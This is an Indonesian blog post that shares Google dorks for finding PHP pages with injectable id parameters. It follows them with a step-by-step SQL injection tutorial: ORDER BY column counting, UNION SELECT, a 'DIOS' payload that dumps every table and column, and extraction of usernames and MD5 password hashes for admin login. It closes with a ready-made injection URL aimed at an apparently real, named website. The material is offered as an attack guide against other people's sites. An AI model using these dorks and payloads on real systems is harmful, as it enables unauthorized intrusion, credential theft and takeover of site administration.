Bagi Bagi Dork SQL + Langkah SQLi

Dork and Tutor SQLi

Hanya Kegabutan Berfaedah






Dios

concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))

Dork + tutor SQL injection

Dork :
inurl:content.php?id= site:vn
inurl:index.php?id= site:vn
inurl:main.php?id= site:vn
inurl:streampage.php?id= site:uk
inurl:base.php?id= site:us
inurl:content.php?id= site:in
inurl:catalog.php?id= site:fr
inurl:view.php?id= site:nl
inurl:detail.php?id= site:vn
inurl:page.php?id= site:in
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:rtray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurlinions.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:articipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:rod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:erson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:rofile_view.php?id=
inurl:category.php?id=
inurl:ublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:rod_info.php?id=
inurl:shop.php?do=part&id=
inurl:roductinfo.php?id=
inurl:collectionitem.php?id=

Tutor :
Tutorial Sql Injection:

1. Seperti biasa siapkan website yang vuln terhadap serangan Sql Injection , tandanya kalau vuln gimana min ?? kalau webnya vuln maka akan muncul error ketika kita memberi karater (') di parameternya. Untuk pesan error akan berbeda-beda yaa, selain itu jika website blank juga kemungkinan vuln
2. Selanjutnya adalah mencari jumlah tabel yang ada dalam database dengan menggunakan query Order by , contoh:
3.  https://target.com/p?id=12'+order+by+1--+
maka web akan normal kembali

3. Lanjutkan dengan mengganti angka 1 menjadi 2/3/4/5/6 dan seterusnya sampai muncul pesan error lagi
4. Nah disitu mimin error di angka 13, logikanya begini ketika kita melakukan perintah order by 1,2,3 dan seterusnya sampai 12 tidak error dan di nomor 13 terjadi error , itu artinya jumlah tabel yang ada didalam database tidak sampai 13 , lalu berapa jumlah tablenya min?? jumlah tabelnya yaitu 12 karena merupakan angka terakhir yang tidak error.
5. Berikutnya kita akan cari angka togelnya , gunakan perintah UNION SELECT, contohnya:
6.  https://target.com/p?id=12'+union+select+1,2,3,4,5,6--+
untuk angkanya sesuaikan jumlah tabelnya di step nomor 4 ya

6. Maka akan keluar angka seperti diatas yang saya lingkari , disitu keluar angka 9 berarti kita bisa lakukan injeksi di angka tersebut, ganti angka 9 dengan perintah:
concat(database(),version())

untuk mengetahui database dan versi yang digunakan , contohnya:
https://target.com/p?id=12'+union+select+1,2,3,4,5,6,7,8,concat(database(),version()),10,11,12--+
7. Untuk melakukan dump table pada database kita gunakan query DIOS (Dump In One Shot)
,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),

contohnya seperti ini:
https://target.com/p?id=12'+union+select+1,2,3,4,5,6,7,8,concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),10,11,12--+
8. Disini kita sudah tau tabel & kolom di dalam database nya , disini saya akan dump data username dan password yang ada ditabel penggua caranya seperti ini:
https://target.com/p?id=12'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,passworduser),10,11,12+from+pengguna--+

9. Sudah muncul username dan password , akan tetapi password masih terenkripsi dengan tipe hash MD5 , kita decrypt terlebih dahulu dengan online tools
10. Username sudah , password juga sudah tinggal kita cari halaman adminnya saja kemudian login ke
Reference : https://d4rkxploit13.blogspot.com/2020/09/tutorial-bug-sql-injection.html?m=1


http://heritageaviation.in/news.php?id=-2%27+union+select+1,concat(database(),version()),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),,3,4,5,6,7,8,9,10,11--+





Okeh sekian Terimakasih_-"

Posting Komentar

Post a Comment (0)

Lebih baru Lebih lama